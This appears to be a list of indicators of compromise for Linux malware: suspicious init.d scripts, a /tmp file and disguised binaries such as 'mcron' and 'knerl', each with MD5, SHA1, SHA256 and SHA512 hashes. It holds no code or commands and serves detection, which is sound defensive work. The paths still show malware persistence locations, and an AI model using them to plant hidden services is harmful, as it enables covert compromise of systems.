/etc/init.d/sedmurBwi

MD5 69497d0565055f626ee2bc84f818ce0f
SHA1 b5ca73e0fef84a5aa8f0155f160952c4385045b8
SHA256 5416ce07a0caf57f145d8f4f07e036d2decd72023e649f782d30be599ddf20da
SHA512 23d14d2c9f3356242a56f2716bd79d31f6c8a936c7a581d4b472ca126113a6b589f4ceb37816178b17ca09f508f196009ffcb390d349302a54dee0644f995bec

/etc/init.d/sedlS4UXu

MD5 e4da2ae5c153148fad0b3f6e5e7ce61e
SHA1 3ef89c60b9f66bad7834dc5621772d474e3e36d9
SHA256 373a932050d1fd4912c80fff5b941e49d37bf9899d156b524c6404f1c76e3923
SHA512 dff5193df49f6e639d76f38d0a45cd68efec5e6d4ee06801d732cdb1e3ca7057820be046fba05e13d07d934f248773df246760b6288b9753abe067f268d7cc10

/etc/init.d/sed894o2H

MD5 4bf46072f9f13b2e38d58a053def37d5
SHA1 94e4b56f7a5d40a40f256a474e244642ad778a4e
SHA256 a6ef18d6a1b3f33cb3df0dce41759bda88e3133d249e6c13848fb0a007654cbf
SHA512 0ffe565c26cf1585a0d26f47328fca2d886fc33b43537f4674d0f13d6eee3f39775fa0115e8b3606148665807540244e517d7c10130c161e7191172a76a031de

/tmp/sh-thd.9HUJKD

MD5 2ff9930962f5ed39a68bfabddc3551ac
SHA1 9f99fbefee4a609f403025ed510c2fa93982303b
SHA256 d00546c6e26a2f1e7c7ae24a5173fb58b3d7e060d4920b7a7ba772bc76e956f7
SHA512 6b6cd3c027e2b1b3b19519a413b96f15d4dc5579f30b61919e1ab7f2e1273141dec54d8b21cf49a8b89815d3cd9694354788a13ec651e0479eb70a53f576d1df

/etc/init.d/crontabs

MD5 f21f5717d956b60f695d350bbab05716
SHA1 1155f2cf27dc56f0e981ab78517dbf6d1b45d72f
SHA256 c19b0543ff2a66484d54268c27defcd2a8d5b9ac26e267c73dace034ac21931e
SHA512 2bdf31983a48991dc7de0c2d25cb97a032fc6fd29fe1534536b9e910504a6d1317d83c935ad92bab979065da81f4f2c6218b7d2f5df31ffcc8190952a49e9ba2

/usr/local/sbin/mcron

MD5 7cd0552f2eb740d23790d82134d0adb8
SHA1 c600bdcf3ba70156856b6712070a3c65368e2e62
SHA256 62b44a654916d6e52af20897cbcf39e4134b4c79d2498fbbc08987cc392b5788
SHA512 43309fdf0e4c2a1a7503488bd0493ebd1cb66cecf2fdf19dd76be9848a80be1478fcc0662c382ad8230ecf4963d89b8c1d58c33670db8777d136ae089517e9a7

/usr/bin/bsd-port/knerl

MD5 8a51a05df6f69f2a6fc4c4e376b65f70
SHA1 1b68e2894d97363dcd9f2d7e42724dfc58e0a260
SHA256 7f048a07a9c6166054ae0a1fe9af0c38769ff6fc5189ada4e4144c71e5d24994
SHA512 505595aeeae9018dc0d31e158899d620ef4fe1d9d8e510ee10a82aec889202e4994a3e387f628033a90aa53d633c1e7c7865a98cfdfb147ecc950b3c1376a37d

/etc/init.d/grub

MD5 81bb3911dc14f3eb53d0700a4aa50475
SHA1 89531a3a74e100f51118a6c12d7a4e8d346eeac4
SHA256 8027b789feb011489894fbac26a9d3e4ecc60972d85c5df7438c3dc390fc1962
SHA512 632e4fc0d9be24c69faa8fd0e702f25a6530698908401cc868d2c294c83703b99c1378196b1b4456bc6e1d1bf364960e18427e92509d6c5bb94b4cb4d7e78995